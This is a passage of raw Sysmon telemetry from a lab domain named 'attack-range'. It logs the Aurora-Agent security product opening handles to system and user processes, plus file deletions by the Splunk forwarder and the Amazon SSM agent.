Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.715{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000044375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.130{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=765FA337D213BD2F201DD33639677510,SHA256=0EC905EB39C098CA183AA8D138AA31016730D254D1DD8F7708EE43E710DD166C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017074Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:12.537{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-035MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017073Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:12.518{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6863E1F9A685717CD8892B8F809FD9,SHA256=F9D12B1F6DC74E72DA918C2B1C1A9DC15053021698060D4ACE8CB3D8A4809423,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:12.305{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000044400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:12.192{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E3EDC088C15B7C7C86A6F5D5EF5714,SHA256=CF093035E7C3DF40AEC18062CE89DC45053D79C0B97DC1AE32A23AB7DD91CBBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017076Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:13.609{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=841C326F5A9B0F5486EC7AF3C600AFB6,SHA256=5195F8EBD7AF374965B44C7656F3A5E102FB830B5EAA9C4CCDA7D4D67098D8FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017075Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:13.538{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-036MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:13.300{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6DE566492531E08C7E90EFA97209C3C,SHA256=353070CDD00C62B7B8E263DC45263D36D28807CE6D10ED999A561B8A375231EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017077Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:14.583{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF15688C0DE1D49CE30756AE38B65FA6,SHA256=CAFB8F9DF7556ACB9447DE47E5D6F8418891FB9DB8D97C1FF321FCC281F85978,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.991{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.985{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.980{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.969{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.969{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.968{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.968{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.966{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.960{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.948{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.924{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.917{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.903{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.893{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 